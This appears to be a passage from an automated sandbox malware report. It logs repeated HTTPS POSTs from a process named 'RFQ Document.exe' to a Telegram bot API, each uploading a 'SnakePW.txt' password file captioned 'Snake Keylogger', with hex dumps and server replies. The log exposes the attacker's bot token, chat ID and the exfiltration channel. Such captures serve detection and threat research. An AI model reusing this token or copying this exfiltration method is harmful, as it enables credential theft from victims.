                                            2021-09-28 06:00:02 UTC499INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12898,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808802,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            316192.168.2.450153149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:02 UTC500OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f9c112f6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:02 UTC500OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 39 63 31 31 32 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f9c112f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:02 UTC500INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:02 UTC501INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12899,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808802,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            317192.168.2.450154149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:02 UTC501OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f9ebfc06
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:02 UTC501OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 39 65 62 66 63 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f9ebfc06Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:02 UTC502INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:02 UTC502INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12900,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808802,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            318192.168.2.450155149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:02 UTC503OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fa063563
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:02 UTC503OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 30 36 33 35 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fa063563Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:02 UTC503INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:02 UTC504INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12901,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808802,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            319192.168.2.450156149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:02 UTC504OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fa1e0cda
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:02 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 31 65 30 63 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fa1e0cdaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:03 UTC505INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:03 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:03 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12902,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808803,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            32192.168.2.449806149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:27 UTC51OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c5b851c7
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:27 UTC51OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 62 38 35 31 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c5b851c7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:27 UTC51INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:27 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:27 UTC52INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12612,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            320192.168.2.450157149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:03 UTC506OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fa35e4b2
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:03 UTC506OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 33 35 65 34 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fa35e4b2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:03 UTC507INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:03 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:03 UTC507INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12903,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808803,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            321192.168.2.450158149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:03 UTC508OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fa67f5d6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:03 UTC508OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 36 37 66 35 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fa67f5d6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:03 UTC508INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:03 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:03 UTC509INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 33 2c 22 64
